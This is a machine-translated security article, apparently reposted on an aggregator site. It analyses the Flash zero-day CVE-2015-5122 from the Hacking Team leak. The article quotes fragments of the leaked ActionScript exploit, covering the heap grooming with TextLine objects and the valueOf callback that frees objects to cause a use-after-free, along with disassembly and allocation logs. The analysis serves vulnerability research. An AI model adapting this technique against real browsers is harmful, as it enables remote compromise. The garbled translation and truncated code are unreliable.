Hacking Team attack code analysis Part 4: Flash 0day Vulnerability CVE-2 0 1 5-5 1 2 2-vulnerability warning-the black bar safety net

2015-07-12T00:00:00
ID MYHACK58:62201564575
Type myhack58
Reporter 佚名
Modified 2015-07-12T00:00:00

Description

A few days ago we analyzed the Hacking Team leaks data 3 virus, including a flash 0day, a flash nday and a windows font to mention the right to 0day on. Yesterday Adobe released the latest flash version 18.0.0.203, and patching one of the flash 0day(CVE-2 0 1 5-5 1 1 9-in. However, today twitter above and researchers to blast dirt, called Hacking Team leaked data, there is an unpatched flash 0day in the latest flash version can still be triggered. Adobe subsequently released the corresponding security Bulletin APSA15-0 4, vulnerability the CVE number is: CVE-2 0 1 5-5 1 2 2。 Impact Windows, MacOSX and Linux platforms on IE, Chrome and other mainstream browsers. ! We go through the analysis, confirm this really is again a new flash 0day, the vulnerability causes the DisplayObject in setting the opaqueBackground property when not handled correctly may occur in the callback and is valueOf, is the next input, and produce a Use After Free vulnerability. This article will analyze the vulnerability of the Genesis and use. 0x01 exploits the principle of analysis The problem is a function of the DisplayObject object's opaqueBackground property is set function: We look at HackingTeam disclosure of the exploit code, The key section is as follows: 1 for(i=_arLen1; i 2 _ar[i] = BT. createTextLine(); // fill 1 0 1 6-byte holes (0x38c is a size of internal TextLine object) 3 for(i=_arLen1; i 4 _ar[i]. opaqueBackground = 1; // alloc 1 0 1 6 bytes In this process each TextLine Object inside will be assigned 0x390 size of the object, the object allocation code in: 1 . text:1025DC71 push 1 2 . text:1025DC73 push eax 3 . text:1025DC74 push 390h 4 . text:1025DC79 call operator_new2 The commissioning process in the assigned 0x390 internal object address: Allocate 0x390 object:04cbc810 Allocate 0x390 object:0513c810 Allocate 0x390 object:0513cc08 Allocate 0x390 object:05d94020 Allocate 0x390 object:05d94418 Allocate 0x390 object:05d94810 Allocate 0x390 object:05d94c08 Allocate 0x390 object:05d95020 Allocate 0x390 object:05d95418 Allocate 0x390 object:05d95810 Allocate 0x390 object:05d95c08 Allocate 0x390 object:05d96020 Allocate 0x390 object:05d96418 Allocate 0x390 object:05d96810 Allocate 0x390 object:05d96c08 Allocate 0x390 object:05d97020 Allocate 0x390 object:05d97418 2 Set the opaqueBackground, triggering the valueOf function call: 1 MyClass. prototype. valueOf = valueOf2; 2 3 // here we go, call the vulnerable setter 4 _cnt = _arLen2-6; 5 _ar[_cnt]. opaqueBackground = _mc; And before the two vulnerabilities, the exploit defines its own class, setting the valueOf function, and then in the opaqueBackground of the set function, we can see that there is an incoming parameter is converted to integer of the process, this call triggers a MyClass. valueOf function: . text:1025DD4C loc_1025DD4C: CODE XREF: set_opaqueBackground+2Fj . text:1025DD4C push ebx . text:1025DD4D push [esp+10h+param] . text:1025DD51 call ? integer@AvmCore@avmplus@@SAHH@Z ; avmplus::AvmCore::integer(int) 3 in the valueOf function, the release of the TextLine Object, and use the vector placeholder 0 1 static function valueOf2() 0 2 { 0 3 try 0 4 { 0 5 if (++_cnt 0 6 // recursive call for next TextLine 0 7 _ar[_cnt]. opaqueBackground = _mc; 0 8 }else{ 0 9 Log("MyClass. valueOf2()"); 1 0 1 1 // free internal objects 1 2 for(var i:int=1; i 1 3 BT. recreateTextLine(_ar[_arLen2-i]);

[1] [2] next